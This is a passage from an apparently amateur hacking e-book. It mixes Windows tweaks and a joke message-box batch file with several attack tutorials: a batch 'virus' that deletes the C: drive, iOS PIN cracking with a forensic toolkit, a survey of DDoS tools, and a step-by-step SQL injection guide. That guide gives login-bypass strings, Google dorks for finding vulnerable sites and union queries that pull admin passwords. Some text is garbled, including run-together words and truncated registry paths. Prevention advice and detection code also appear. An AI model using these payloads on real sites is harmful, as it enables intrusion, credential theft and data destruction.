PREVENTIONS:

The best defense against the installation of keystroke-logging software on your systems is to use an anti-malware program that monitors the local host. It's not foolproof but can help. As for physical keyloggers, you'll need to visually inspect each system.

The potential for hackers to install keystroke-logging software is another reason to ensure that your users aren't downloading and installing random shareware or opening attachments in unsolicited emails. Consider locking down your desktops by setting the appropriate user rights through local or group security policy in Windows.

DO YOU HAVE RATED 7.9?

Learn How to Hack Windows Experience Index

Starting from Windows Vista, Microsoft introduced a kind of benchmarking system in its operating system. In Windows Vista and 7, users can rate their PC using the Windows Experience Index. The highest possible score in Windows Vista is 5, while Windows 7 machines can go up to 7.9 in the experience index.

In the Windows Experience Index the base score is based on the lowest score of any component. For example, on the test PC the base score was 4.4 because of the Graphics subscore.

However, it is not so tough to manipulate these numbers and change these scores according to your will. You can change these just to fool anyone.

GETTING STARTED

To make things simple, we recommend you run the Windows Experience Index first (if you have not done so). If you have done that you can skip this section.

To do that, open Control Panel, go to System and Security and then click on Check the Windows Experience Index.

After that click on Rate This Computer. Note that your computer may take several minutes to rate the system.

You will see a screen similar to this.

MESSING UP WITH SCORES

To manipulate these scores, head to the Windows installation drive (C: in our case). Then go to

Windows > Performance > WinSAT > DataStore

You will be able to see several indexing files there.

You will need to open the file ending with "Formal.Assessment (Initial).WinSAT".

Open the file in Notepad. You will see the following window:

In the Notepad window you don't need to go too far down to hunt for anything; simply change the values according to your will in the upper area. The values are written between tags, such as

<MemoryScore>5.9</MemoryScore>

Change the values between the tags and save the file. Next time you open the Windows Experience Index the values will be changed.

OFF THE ROAD TIP: For more fun we suggest everyone keep their scores realistic (not 7.9 exactly).

To revert the changes you can re-run the assessment.

THE HIDDEN DRIVES

HACK TO HIDE LOCAL DRIVES

In this article we are going to learn about hiding stuff. Generally, you hide the particular file which you want to keep personal.

That is the most common way these days, and it can easily be exposed even by a middle school child.

But here we are going to learn how to hide whole specified drives (local disks), which keeps you safe from the children in your family. You can easily keep your data safe, whether it is your girlfriend's pic or blah… blah… blah…!

Let's start to learn how to hide the specified drives step by step:-

To hide the drives you have to edit the group policies of your computer. To edit group policies, just go to the "Run" option, type "gpedit.msc" and click on OK. Or you can easily search in your search box for GROUP POLICY.

The group policy editor will open in front of you!

Then you will see in the left part of the window there is a "USER CONFIGURATION" option. Under the user configuration option there are three options:

1.) Software settings

2.) Windows settings

3.) Administrative templates

Just give a single click on the Administrative Templates option. You will see that some options are made available in the right part of the window. Open the "All Settings" option.

When you have opened the "All Settings" option, a long list of options is displayed in front of you! Click on the "Settings" column to arrange them alphabetically. If they are already arranged you can skip this step.

Now, pressing the "H" key of your keyboard a few times, search for the "Hide these specified drives in My Computer" option.

Double click on the "Hide these specified drives in My Computer" option. A window will open in front of you.

"ENABLE" it and choose the drives which you want to hide from the given options in the lower left part of the window. After applying the settings just click on OK and you will see the drives hidden according to your choice. I have selected to hide only the A, B, C and D drives, so the E: drive will not be hidden in the screenshot given below.

In the above screenshot only the "E:" drive is shown to the user. If you want to access the drives which are hidden then you have to click on the address bar of the My Computer window, as marked in the above screenshot, type "D:" or "C:" and press the ENTER key of your keyboard to open the respective drive.

EMPTY HDD

FORMAT HARD DISK WITH NOTEPAD

In this article we are going to learn how to completely delete the C: drive of your computer without a formatting compact disk. Do it at your own risk, because it will destroy the Windows installation of your system, and for this I am not responsible.

FOLLOW THE BELOW STEPS TO FORMAT YOUR C: DRIVE:

Open Notepad and type the following code:

CODE:@echooffdelC:\*.*\y

Save it with the extension ".bat", such as "virus.bat".

Double click on the saved file to run this virus. The command prompt will open in front of you, where it will be deleting your drive.

Note: "I have not tried this virus yet, and also please don't try it on your personal computers. If you have ever tried it, please give me your reviews."

LET'S HAVE SOME FUN

FUNNY VIRUS TO SHOCK YOUR FRIENDS

Hello guys, I think after reading the above chapters it's now time to have some fun. In this article we are going to learn how to give a shock to your friend for a minute.

Basically, here we are going to create a funny virus which will not actually harm your friend's computer, but it will shock him/her for a minute.

So let's create that virus following the same steps as we used to create some viruses in previous chapters.

So follow the steps:

Open Notepad and type the following code:

CODES:
@echo off
msg * your computer is attacked by a virus.
msg * click ok to format.
msg * all your data has been deleted.

Save the document with the extension ".bat". For example you can save the virus with the name "funnyvirus.bat".

Now your work is to execute the virus. Just double click on the virus and it will show you a message that "your computer is attacked by a virus".

Now whether you click on "ok" or you close the above message box, it will again show you a message: "click ok to format". And I am sure that you are not going to click on ok.

But again it does not matter if you click on ok or close the box, though I am sure that you will close the box. Again it will show you a message that "all your data has been deleted". And for a moment your friend's heartbeat is going to be at its peak.

So this is a funny way to shock your friends without actually harming them.

DO YOU HAVE i7?

HOW TO CHANGE YOUR PROCESSOR NAME

The trick we are going to learn here is the most interesting trick, and I am sure that it will increase your prestige among your friends, because these days it's a big deal among your group of friends whether you have an i3, i5 or i7 processor. So let's learn how to change your PC from any core processor to an i7.

For this you have to follow these steps:

First of all you have to go to the "Run" option and write "regedit" to open the registry editor of your computer, then click on OK. It will open the registry editing window in front of you.

Open "HKEY_LOCAL_MACHINE" as highlighted in the figure.

Then open the "hardware" option present under it.

Then open the "Description" option and then open the "system" option. Also open the "central processor" option under the system option.

Then give a single click on the "0" folder present under "central processor". You will then see that a lot of options appear in the right part of the regedit window. These are called STRINGS. Search for the "processor name string" among those strings.

Open the processor name string by double clicking on it. A dialogue box will open in front of you. In the "value data" text box it is written what your computer's processor actually is.

I am using "Pentium(R)[email protected]" as written in the value data. Now delete that text and write your own text in its place. For example, you can write "Intel(R)[email protected]" and click on the "ok" option.

Now close the registry editor and let's check if it is working or not. To check it, you have to look at the properties of your computer: just right click on the My Computer icon and click on the "properties" option, which is the last option of the dialogue box.

The system properties of your computer are shown in front of you.

Yuppie! As you have seen, the processor name will be as expected. Now your processor is turned into an i7.

And now you can say with pride that YOU HAVE A CORE i7 PROCESSOR.

GOOGLE

HOW TO MAKE YOUR GOOGLE SEARCHES EFFECTIVE

In this article we are going to learn how to make our Google searches effective. If we have to find anything on Google we open the Google website and start searching. For example, if you want to download a book you write something like "fifty shades of grey for free". You will then find a huge number of results, like 753286543567 results in 0.43 seconds, which makes it difficult to find the exact working download link for that book.

You can take some very simple steps to reduce your Google search results. Let's assume we have to download the same book as mentioned above. If you write your search in the following way it will reduce your Google search results and make it simple to find the exact download link. Write it this way in the Google search box: you have to write your search in double quotes. Like:- "fifty shades of grey.pdf"

Note:- don't forget to add the extension ".pdf"

Second method:- using "GOOGLE HACKS"

You can also use an application named "Google hacks". It is easily available on the net and you can find the download easily through a Google search.

This application also helps you a lot in performing effective searches.

iOS PASSWORD CRACKING

IOS PASSWORD CRACKING

These days people generally use a 4-digit PIN to secure their phone. A mobile device gets lost or stolen, and all the person recovering it has to do is try some basic number combinations such as 1234, 1212, or 0000, and soon the device will be unlocked.

Let's see how to crack your iOS password:

1. For the first step you have to plug your iPhone into your computer and put it into device firmware upgrade mode, i.e. DFU mode:

To enter DFU mode, simply power the device off, hold down the Home button (bottom center) and the sleep button (upper corner) at the same time for 10 seconds, and continue holding down the Home button for another 10 seconds. The mobile device screen goes blank.

2. After putting your phone into DFU mode you need to load the iOS Forensic Toolkit. For this you need to insert your USB license dongle into your computer and run Toolkit.cmd:

3. After that, the work to do is to load the iOS Forensic Toolkit Ramdisk onto the mobile device by selecting option 2 LOAD RAMDISK:

When you have loaded the RAMDISK code, it allows your computer to communicate with the mobile device and run the tools which are needed for cracking the password (among other things).

4. Now you need to select the iOS device type/model that is connected to your computer, as shown in Figure:

I don't have an iPhone 6 with me now, so I have selected option 14 because I have an iPhone 4 with GSM.

After that you see the toolkit connecting to the device, and it confirms a successful load, as shown in Figure:

Also you will see the Elcomsoft logo in the middle of your mobile device's screen… I think it looks pretty:

6. Now if you want to crack the device's password/PIN, you simply have to select option 6 GET PASSCODE on the main menu:

iOS Forensic Toolkit will prompt you to save the passcode to a file. To save the passcode, you can simply press Enter to accept the default of passcode.txt. The cracking process will commence and, with any luck, the passcode will be found and displayed as shown in Figure:

So, having no password for phones and tablets is bad, and a 4-digit PIN such as this is not a much better choice either.

So be aware of the attacks! Get up, users, get up: it's time to be secured. You can also use iOS Forensic Toolkit to copy files and even crack the keychains to uncover the password that protects the device's backups in iTunes (option 5 GET KEYS).

PREVENTION: To prevent being hacked you can refer to the chapter "PASSWORD CREATING POLICIES".

HIDE YOUR RECYCLE BIN

HACK TO HIDE THE RECYCLE BIN

Sometimes when you try to modify the Windows GUI, or even when you install a theme for your Windows, you find that the recycle bin icon remains unmodified and destroys the beauty of your modification.

So in this article we are going to learn how to delete the RECYCLE BIN by hacking the registry.

To delete the recycle bin you need to open the registry editor of your computer. I think after reading the above sections you are now familiar with the "registry editor". So go to the registry editor and follow the given path.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVe00AA002F954E}

When you finally open the last path, you will see that the default string of the recycle bin is defined. Now DELETE that string and restart your computer. You will find that the recycle bin is deleted. I am attaching a screenshot for your ease.

After finishing all the steps don't forget to restart your computer. It will work only after the restart.

HOW BOTNET DDoS ATTACK WORKS…

DDoS Attack?

DDoS stands for "Distributed Denial of Service." A DDoS attack is a malicious attempt to make a server or a network resource unavailable to users, usually by temporarily interrupting or suspending the services of a host connected to the Internet. In contrast to a Denial of Service (DoS) attack, in which one computer and one internet connection is used to flood the targeted resource with packets, a DDoS attack uses many computers and many internet connections.

DDoS attacks are loosely divided into three different types. The first, Application Layer DDoS Attacks, includes Slowloris, zero-day DDoS attacks, DDoS attacks that target Apache, Windows or OpenBSD vulnerabilities, and more. Comprised of seemingly legitimate and innocent requests, the goal of these attacks is to crash the web server, and the magnitude is measured in requests per second.

The second kind of DDoS attack, Protocol DDoS Attacks, includes SYN floods, fragmented packet attacks, Ping of Death, Smurf DDoS and more. This sort of attack consumes actual server resources, or those of intermediate equipment such as firewalls and load balancers, and is measured in packets per second.

The third kind of DDoS attack is usually considered the most dangerous. Volume-based DDoS Attacks include UDP floods, ICMP floods, and other spoofed-packet floods. The volume-based attack's goal is to saturate the bandwidth of the attacked website, and magnitude is measured in bits per second.

Botnet?

Sometimes referred to as a "Bunch of Zombies," a botnet is a group of Internet-connected computers, each of which has been maliciously taken over, usually with the help of malware like Trojan horses. Usually without the knowledge of the computers' rightful owners, these machines are remotely controlled by an external source via standard network protocols, and often used for malicious purposes, most commonly for DDoS attacks.

Botnet Tools

The originator of a botnet is commonly referred to as a "bot herder" or "botmaster." This individual controls the botnet remotely, usually through an IRC server or a channel on a public IRC server, referred to as the command and control (C&C) server. To communicate with the C&C server, the botmaster uses various hidden channels, as well as seemingly innocuous tools like Twitter or IM. More advanced bots automatically seek out more resources to exploit, joining more systems to the botnet in a process referred to as "scrumping." Botnet servers may continually communicate and cooperate with other botnet servers, making entire communities of botnets, with individual or multiple botmasters. This means that any given botnet DDoS attack may have multiple origins, or be controlled by multiple people, sometimes operating in coordination, sometimes operating singly.

Botnets are available for rent or lease from various sources, and use of botnets is auctioned and traded among attackers. Actual marketplaces have sprung up: platforms that enable trading in large numbers of malware-infected PCs, which can be rented and used in botnet DDoS or other attacks. These platforms provide botnet DDoS attack perpetrators with a complete and richly-featured toolkit, and a distribution network as well. Even for non-technical users, botnet DDoS attacking may be a viable and efficient choice to "take out" a competitor's website. Within the crime ecosystem, botnet DDoS attacks are a mainstream commodity, with prices falling and effectiveness and sophistication growing. A number of the most common tools for initiating a botnet DDoS attack are easily downloaded from multiple online sources, and include:

SlowLoris

Especially dangerous to hosts running Apache, dhttpd, Tomcat and GoAhead WebServer, Slowloris is a highly targeted attack, enabling one web server to take down another server without affecting other services or ports on the target network.

Tor's Hammer

Is a slow-POST DoS testing tool written in Python. It can also be run through the Tor network to be anonymized. There are several tools for testing server readiness to withstand botnet DDoS attacks.

Qslowloris

Uses Qt libraries to execute the methods used by Slowloris, providing a graphical interface that makes the program very simple to use.

Apache Killer

Utilizes an exploit in the Apache OS first discovered by a Google security engineer. Apache Killer pings a server and tells the server to break up whatever file is transferred into a huge number of little chunks, using the "range" variable. When the server tries to comply with this request, it runs out of memory, or encounters other errors, and crashes.

PyLoris

It is a scriptable tool for testing a service's level of vulnerability to a specific category of Denial of Service (DoS) attack.

DDoSim

Which can be employed in a laboratory environment to simulate a DDoS attack, and helps measure the capacity of a given server to handle application-specific DDoS attacks, by simulating multiple zombie hosts with random IP addresses that create TCP connections.

Botnet DDoS Attacks

Botnet DDoS attacks are quickly becoming the most prevalent type of DDoS threat, growing rapidly within the past year in both number and volume, according to recent market research. The trend is towards shorter attack duration but bigger packet-per-second attack volume, and the overall number of attacks reported has grown markedly as well. The average attack bandwidth observed during this period of 2010-2012 was 5.2 Gbps, which is 148% above the previous quarter. Another survey of DDoS attacks found that more than 40% of respondents experienced attacks that exceeded 1 Gbit per second in bandwidth in 2011, and 13% were targeted by at least one attack that exceeded the 10G rate. From a motivational perspective, newer research found that ideologically driven DDoS attacks are on the rise, supplanting financial motivation as the most frequent incentive for such attacks.

WEBSITE HACKING

WEBSITE HACKING

Now take your time and be serious and free before starting this article, because this is a very wide topic and one of the most interesting articles among all of the above chapters. In this chapter we will discuss how to hack any vulnerable site using SQL injection.

What is SQL Injection?

SQL injection is one of the popular web application hacking methods. Using an SQL injection attack, an unauthorized person can access the database of the website. The attacker can extract the data from the database.

What can a hacker do with an SQL injection attack?

* Bypassing logins

* Accessing secret data

* Modifying contents of the website

* Shutting down the MySQL server

So, here we start with bypassing login, i.e. authentication bypass:

In this type of SQL injection, we have generally found the admin login page, and after that we try to open the control panel account of the admin by bypassing the authentication. If you have the admin login page of any website then you can paste the following codes (with quotes) to bypass the authentication of the website. Generally PHP websites are vulnerable to this injection:

You can find these types of sites simply by Google searches. You have to type like this in the Google search bar:

www.thesitename.com/adminlogin.php? or /admin.php? or Wp-login.php? etc.

After finding the login page you have to paste the following codes in both the user ID and password fields of the admin page till it is bypassed. If not, we will try the next SQL injection, i.e. union based, blind based, error based etc.

Codes to be used as both user ID and password at the admin login page of a vulnerable website for bypassing authentication are as follows:

‘or’1'=’1‘or‘x’='x‘or0=0–”or0=0–or0=0–‘or0=0#”or0=0#or0=0#‘or‘x’='x”or“x”=”x‘)or(‘x’='x‘or1=1–”or1=1–or1=1–‘ora=a–”or“a”=”a‘)or(‘a’='a“)or(“a”=”ahi”or“a”=”ahi”or1=1–hi’or1=1–‘or’1=1'

If the authentication bypass does not work then try the following techniques carefully and step by step:

UNION BASED SQLi:

Finding a Vulnerable Website:

To find an SQL injection vulnerable site, you can use Google search by searching for certain keywords. Such a keyword is often called a "GOOGLE DORK".

Some examples:

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Now you have to copy one of the above keywords and Google it. Here, we will get a lot of search results, and we have to visit the websites one by one to find the vulnerability.

For example: site:www.anyselectedsite.com inurl:index.php?id=

Step 1: Finding the Vulnerability:

Now let us check the vulnerability of the target website. To check the vulnerability, add a single quote (') at the end of the URL and press enter.

For eg: http://www.anyselectedsite.com/index.php?id=2'

If the page remains the same or shows page not found, then it is not vulnerable. If you get an error message just like this, then it means that the site is vulnerable.

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 2: Finding Number of columns in the database:

Great, we have found that the website is vulnerable to SQLi attack. Our next step is to find the number of columns present in the target database. For that, replace the single quote (') with an "order by n" statement. Change n from 1,2,3,4,5,6,...n until you get an error like "unknown column".

For eg:

http://www.anyselectedsite.com/index.php?id=2 order by 1
http://www.anyselectedsite.com/index.php?id=2 order by 2
http://www.anyselectedsite.com/index.php?id=2 order by 3
http://www.anyselectedsite.com/index.php?id=2 order by 4

If you get the error while trying the "n"th number, then the number of columns is "n-1". I mean:

http://www.anyselectedsite.com/index.php?id=2 order by 1 (no error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 2 (no error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 3 (no error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 4 (no error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 5 (no error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 6 (no error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 7 (no error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 8 (error shown)

So now n=8, and the number of columns is n-1, i.e. 7.

In case the above method fails to work for you, then try to add "--" at the end of the statement. For eg:

http://www.anyselectedsite.com/index.php?id=2 order by 1--

Step 3: Find the Vulnerable columns:

We have successfully found the number of columns present in the target database. Let us find the vulnerable column by trying the query "union select columns_sequence".

Change the id value to negative (I mean id=-2). Replace columns_sequence with the numbers from 1 to n-1 (the number of columns) separated with commas (,).

For eg:

If the number of columns is 7, then the query is as follows:

http://www.anyselectedsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If you have applied the above method and it is not working then try this:

http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--

Once you execute the query, it will display the vulnerable column.

Bingo, columns '3' and '7' are found to be vulnerable. Let us take the first vulnerable column, '3'. We can inject our query in this column.

Step 4: Finding version, database, user

Replace the 3 in the query with "version()". For eg:

http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--

Now it will display the version as 5.0.2 or 4.3, something like this. Replace version() with database() and user() to find the database and user respectively. For eg:

http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--
http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working, then try this:

http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

Step 5: Finding the Table Name

This step works if the database version is 5 or above. If the version is 4.x, then you have to guess the table names (blind SQL injection attack). Let us find the table names of the database. Replace the 3 with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()".

For eg:

http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--

Now it will display the list of table names. Find the table name which is related to the admin or user.

Let us choose the "admin" table.

Step 6: Finding the Column Name

Now replace "group_concat(table_name)" with "group_concat(column_name)".

Replace "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--".

We have to convert the table name to a MySQL CHAR() string. Install the HackBar add-on from: https://addons.mozilla.org/en-US/firefox/addon/3899/

Once you have installed the add-on, you can see a toolbar that will look like the following one. If you are not able to see the HackBar, then press F9.

Select sql -> Mysql -> MysqlChar() in the HackBar.

It will ask you to enter the string that you want to convert to MySQL CHAR(). We want to convert the table name to MySQL CHAR(). In our case the table name is 'admin'.

Now you can see the CHAR(numbers separated with commas) in the HackBar toolbar.

Copy and paste the code at the end of the URL in place of "mysqlchar".

For eg:

http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97,100,109,105,110)--

The above query will display the list of columns. For example:

admin, password, admin_id, admin_name, admin_password, active, id, admin_name, admin_pass, admin_id, admin_name, admin_password, ID_admin, admin_usernme, username, password.. etc..

Now replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2).

Now replace "from information_schema.columns where table_name=CHAR(97,100,109,105,110)" with "from table_name".

For eg:

http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

If the above query displays the 'column is not found' error, then try another column name from the list.

If we are lucky, then it will display the data stored in the database depending on your column name. For example, the username and password columns will display the login credentials stored in the database.

Step 7: Finding the Admin Panel:

Just try with URLs like:

http://www.anyselectedsite.com/admin.php
http://www.anyselectedsite.com/admin/
http://www.anyselectedsite.com/admin.html
http://www.anyselectedsite.com:2082/
etc.

If you are lucky, you will find the admin page using the above URLs, or you can use some kind of admin finder tool like Havij admin finder, or sql poison for SQL attacking (tool).
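How the requests from the steps above look from the defender's side, as an added example that is not part of the book: a Python scanner that normalises request targets from a web access log and flags the stages described (quote probe, order by counting, union select, version/database/user lookups, information_schema and CHAR() use). The log lines, rule names and addresses are constructed for the illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines; the addresses come from documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Jan/2020:10:00:01 +0000] "GET /index.php?id=2 HTTP/1.1" 200 5120
198.51.100.7 - - [10/Jan/2020:10:00:09 +0000] "GET /search.php?q=order+by+price HTTP/1.1" 200 2210
198.51.100.7 - - [10/Jan/2020:10:00:15 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 1980
203.0.113.9 - - [10/Jan/2020:10:01:02 +0000] "GET /index.php?id=2%27 HTTP/1.1" 500 310
203.0.113.9 - - [10/Jan/2020:10:01:20 +0000] "GET /index.php?id=2+order+by+8-- HTTP/1.1" 500 298
203.0.113.9 - - [10/Jan/2020:10:01:41 +0000] "GET /index.php?id=-2/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7-- HTTP/1.1" 200 5133
203.0.113.9 - - [10/Jan/2020:10:02:03 +0000] "GET /index.php?id=-2%20union%20select%201,2,group_concat(column_name),4,5,6,7%20from%20information_schema.columns%20where%20table_name=CHAR(97,100,109,105,110)-- HTTP/1.1" 200 5340
"""

# client address, then the request target inside the quoted request line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} ')

# One rule per stage of the walkthrough; matched against the normalised query.
RULES = [
    ("quote_probe", re.compile(r"=-?\d+'")),
    ("order_by_enum", re.compile(r"\border by \d+")),
    ("union_select", re.compile(r"\bunion (all )?select\b")),
    ("db_fingerprint", re.compile(r"\b(version|database|user)\(\)|@@version")),
    ("schema_enum", re.compile(r"\binformation_schema\.(tables|columns)\b")),
    ("char_encoding", re.compile(r"\bchar\(\d+(,\s?\d+)*\)")),
]


def normalize(request_target):
    """Decode %xx and +, lowercase, and turn /**/ comments and runs of blanks into one space."""
    text = unquote_plus(request_target).lower()
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text)


def classify(request_target):
    """Return the names of the rules that the query string of one request triggers."""
    query = normalize(request_target).partition("?")[2]
    return [name for name, pattern in RULES if pattern.search(query)]


def scan(log_text):
    """Map each client address with at least one hit to its sorted rule names."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        for name in classify(target):
            hits[client].add(name)
    return {client: sorted(names) for client, names in hits.items()}


if __name__ == "__main__":
    for client, names in scan(SAMPLE_LOG).items():
        print(client, names)
```

A single client that walks through several of these stages in sequence is a much stronger signal than any one rule on its own, which is why the result is grouped per address.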

And once you have found the admin panel, you do any further work at your own risk.

PREVENTION:

This article is focused on providing clear, simple, actionable guidance for preventing SQL injection flaws in your applications. SQL injection attacks are unfortunately very common, and this is due to two factors:

1.) The significant prevalence of SQL injection vulnerabilities, and

2.) The attractiveness of the target (i.e., the database typically contains all the interesting/critical data for your application).

It's somewhat shameful that there are so many successful SQL injection attacks occurring, because it is EXTREMELY simple to avoid SQL injection vulnerabilities in your code.

SQL injection flaws are introduced when software developers create dynamic database queries that include user supplied input. To avoid SQL injection flaws is simple. Developers need to either: a) stop writing dynamic queries; and/or b) prevent user supplied input which contains malicious SQL from affecting the logic of the executed query.

This article provides a set of simple techniques for preventing SQL injection vulnerabilities by avoiding these three problems. These techniques can be used with practically any kind of programming language with any type of database.

SQL injection flaws typically look like this:

The following (Java) example is UNSAFE, and would allow an attacker to inject code into the query that would be executed by the database. The unvalidated "customerName" parameter that is simply appended to the query allows an attacker to inject any SQL code they want. Unfortunately, this method for accessing databases is all too common.

String query = "SELECT account_balance FROM user_data WHERE user_name = " + request.getParameter("customerName");

try {
    Statement statement = connection.createStatement( … );
    ResultSet results = statement.executeQuery( query );
}

PREVENTIONS

Option 1: Prepared Statements (Parameterized Queries):

The use of prepared statements (parameterized queries) is how all developers should first be taught how to write database queries. They are simple to write, and easier to understand than dynamic queries. Parameterized queries force the developer to first define all the SQL code, and then pass in each parameter to the query later. This coding style allows the database to distinguish between code and data, regardless of what user input is supplied. Prepared statements ensure that an attacker is not able to change the intent of a query, even if SQL commands are inserted by an attacker. If an attacker were to enter the user ID ' or '1'='1, the parameterized query would not be vulnerable.
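The difference described above, as an added example that is not code from the book: a Python/sqlite3 version of the user_data lookup, run once with string concatenation and once with a bound parameter, on the ' or '1'='1 input and on a legitimate name that contains an apostrophe. The table rows, function names and the in-memory database are assumptions made for the demonstration.

```python
import sqlite3


def make_db():
    """In-memory database with constructed rows, mirroring the user_data table above."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user_data (user_name TEXT PRIMARY KEY, account_balance INTEGER)"
    )
    conn.executemany(
        "INSERT INTO user_data VALUES (?, ?)",
        [("alice", 1200), ("bob", 75), ("o'brien", 430)],
    )
    return conn


def balances_dynamic(conn, customer_name):
    """UNSAFE: user input is concatenated into the SQL text, as in the Java example."""
    query = (
        "SELECT account_balance FROM user_data WHERE user_name = '"
        + customer_name + "'"
    )
    return sorted(row[0] for row in conn.execute(query))


def balances_prepared(conn, customer_name):
    """SAFE: the SQL text is fixed; the input is bound as data through the ? placeholder."""
    query = "SELECT account_balance FROM user_data WHERE user_name = ?"
    return sorted(row[0] for row in conn.execute(query, (customer_name,)))


def compare(customer_name):
    """Run both variants on one input and report the rows returned or the error raised."""
    conn = make_db()
    result = {}
    for label, func in (("dynamic", balances_dynamic), ("prepared", balances_prepared)):
        try:
            result[label] = func(conn, customer_name)
        except sqlite3.Error as exc:
            result[label] = "error: " + type(exc).__name__
    conn.close()
    return result


if __name__ == "__main__":
    for value in ("alice", "' or '1'='1", "o'brien"):
        print(repr(value), compare(value))
```

With the dynamic query the quote-based input returns every balance in the table and the legitimate name o'brien breaks the statement; with the bound parameter the first matches no row and the second returns its single balance.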

2.UsedynamicSQLonlyifabsolutelynecessary.

DynamicSQLcanalmostalwaysbereplacedwithpreparedstatements,parameterizedqueries,orstoredprocedures.Forinstance,insteadofdynamicSQL,inJavayoucanusePreparedStatement()withbindvariables,in.NETyoucanuseparameterizedqueries,suchasSqlCommand()orOleDbCommand()withbindvariables,andinPHPyoucan

usePDOwithstronglytypedparameterizedqueries(usingbindParam()).

Inadditiontopreparedstatements,youcanusestoredprocedures.Unlikepreparedstatements,storedproceduresarekeptinthedatabasebutbothrequirefirsttodefinetheSQLcode,andthentopassparameters.

3. Escaping All User Supplied Input

This third technique is to escape user input before putting it in a query. If you are concerned that rewriting your dynamic queries as prepared statements or stored procedures might break your application or adversely affect performance, then this might be the best approach for you. However, this methodology is frail compared to using parameterized queries, and I cannot guarantee it will prevent all SQL injection in all situations. This technique should only be used, with caution, to retrofit legacy code in a cost-effective way. Applications built from scratch, or applications requiring low risk tolerance, should be built or rewritten using parameterized queries.

This technique works like this. Each DBMS supports one or more character escaping schemes specific to certain kinds of queries. If you then escape all user-supplied input using the proper escaping scheme for the database you are using, the DBMS will not confuse that input with SQL code written by the developer, thus avoiding any possible SQL injection vulnerabilities.

4. Install patches regularly and timely.

Even if your code doesn't have SQL vulnerabilities, when the database server, the operating system, or the development tools you use have vulnerabilities, this is also risky. This is why you should always install patches, especially SQL vulnerabilities patches, right after they become available.

5. Remove all functionality you don't use.

Database servers are complex beasts and they have much more functionality than you need. As far as security is concerned, more is not better. For instance, the xp_cmdshell extended stored procedure in MS SQL gives access to the shell and this is just what a hacker dreams of. This is why you should disable this procedure and any other functionality which can easily be misused.

6. Use automated test tools for SQL injections.

Even if developers follow the rules above and do their best to avoid dynamic queries with unsafe user input, you still need to have a procedure to confirm this compliance. There are automated test tools to check for SQL injections and there is no excuse for not using them to check all the code of your database applications.
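The claim made under Option 1, checked automatically in the way item 6 asks for, as an added example that is not part of the original book. It uses Python's built-in sqlite3 with an in-memory database instead of the Java JDBC code shown above; the table and column names come from the page's query, while the sample rows and function names are constructed for the illustration.

```python
import sqlite3

# Constructed sample rows; table/column names follow the page's query.
ROWS = [("alice", 120.50), ("bob", 75.00), ("O'Brien", 310.25)]


def make_db():
    """Create an in-memory database holding the sample accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user_data (user_name TEXT PRIMARY KEY, account_balance REAL)"
    )
    conn.executemany("INSERT INTO user_data VALUES (?, ?)", ROWS)
    return conn


def balance_dynamic(conn, customer_name):
    """Dynamic SQL: the input becomes part of the SQL text (the unsafe pattern)."""
    query = (
        "SELECT account_balance FROM user_data WHERE user_name = '"
        + customer_name
        + "'"
    )
    return [row[0] for row in conn.execute(query)]


def balance_prepared(conn, customer_name):
    """Parameterized query: SQL text is fixed, the input is bound as data only."""
    query = "SELECT account_balance FROM user_data WHERE user_name = ?"
    return [row[0] for row in conn.execute(query, (customer_name,))]


def audit(lookup):
    """Run two checks against a lookup function and return a list of findings.

    1. The page's probe value ' or '1'='1 matches no user, so it must return
       no rows.
    2. A legitimate name containing an apostrophe must still be found.
    """
    conn = make_db()
    findings = []
    try:
        if lookup(conn, "' or '1'='1"):
            findings.append("probe returned rows")
    except sqlite3.Error:
        findings.append("probe caused SQL error")
    try:
        if lookup(conn, "O'Brien") != [310.25]:
            findings.append("legitimate apostrophe name mismatched")
    except sqlite3.Error:
        findings.append("legitimate apostrophe name caused SQL error")
    return findings


if __name__ == "__main__":
    for fn in (balance_dynamic, balance_prepared):
        result = audit(fn)
        print(fn.__name__, "->", result if result else "no findings")
```

The dynamic version fails both checks: the probe rewrites the WHERE clause, and an ordinary surname with an apostrophe breaks the statement. The parameterized version passes both without any escaping code.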

SQL INJECT ME

TESTING SQL INJECTION BY USING TOOL

